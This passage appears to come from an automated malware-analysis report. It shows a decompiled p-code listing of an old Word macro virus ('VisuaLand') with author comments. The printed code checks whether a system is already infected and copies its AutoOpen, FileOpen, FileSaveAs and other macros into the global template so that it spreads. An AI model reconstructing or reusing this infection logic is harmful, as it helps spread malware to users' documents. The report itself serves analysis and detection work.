' QuoteRem 0x0000 0x001C " Phone: +62 21 5320382"
' Line #16:
' QuoteRem 0x0000 0x0034 " Dedication: - Unknown (Atom was created by you???)"
' Line #17:
' QuoteRem 0x0000 0x0023 " - Eko Sulistiono (MD)"
' Line #18:
' QuoteRem 0x0000 0x002A " - All VirMarker in the World"
' Line #19:
' QuoteRem 0x0000 0x0011 " Thank's: God"
' Line #20:
' QuoteRem 0x0000 0x0041 "-----------------------------------------------------------------"
' Line #21:
' Line #22:
' FuncDefn (Public Sub MAIN())
' Line #23:
' Dim
' VarDefn FN
' Line #24:
' Ld WordBasic
' ArgsMemLd [FileName$] 0x0000
' St FN$
' Line #25:
' OnError <crash>
' BoS 0x0000
' OnError ErrorInfectGlobalTemplate
' Line #26:
' Ld CheckInfected
' LitDI2 0x0000
' Eq
' Paren
' IfBlock
' Line #27:
' Ld FN$
' LitStr 0x000B ":FileSaveAs"
' Add
' LitStr 0x000A "FileSaveAs"
' LitDI2 0x0001
' Ld WordBasic
' ArgsMemCall MacroCopy 0x0003
' Line #28:
' Ld FN$
' LitStr 0x0009 ":FileOpen"
' Add
' LitStr 0x0008 "FileOpen"
' LitDI2 0x0001
' Ld WordBasic
' ArgsMemCall MacroCopy 0x0003
' Line #29:
' Ld FN$
' LitStr 0x0009 ":AutoOpen"
' Add
' LitStr 0x0008 "AutoOpen"
' LitDI2 0x0001
' Ld WordBasic
' ArgsMemCall MacroCopy 0x0003
' Line #30:
' Ld FN$
' LitStr 0x000A ":VisuaLand"
' Add
' LitStr 0x0009 "VisuaLand"
' LitDI2 0x0001
' Ld WordBasic
' ArgsMemCall MacroCopy 0x0003
' Line #31:
' Ld FN$
' LitStr 0x000A ":MyMesaage"
' Add
' LitStr 0x0009 "MyMessage"
' LitDI2 0x0001
' Ld WordBasic
' ArgsMemCall MacroCopy 0x0003
' Line #32:
' Ld WordBasic
' ArgsMemCall SaveTemplate 0x0000
' Line #33:
' EndIfBlock
' Line #34:
' LitStr 0x0009 "VisuaLand"
' Ld WordBasic
' ArgsMemCall Call 0x0001
' Line #35:
' Label ErrorInfectGlobalTemplate
' Line #36:
' EndSub
' Line #37:
' Line #38:
' FuncDefn (Private Function CheckInfected())
' Line #39:
' Dim
' VarDefn I
' Line #40:
' LitDI2 0x0000
' St CheckInfected
' Line #41:
' LitDI2 0x0000
' Ld WordBasic
' ArgsMemLd CountMacros 0x0001
' LitDI2 0x0005
' Ge
' Paren
' IfBlock
' Line #42:
' StartForVariable
' Ld I
…
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.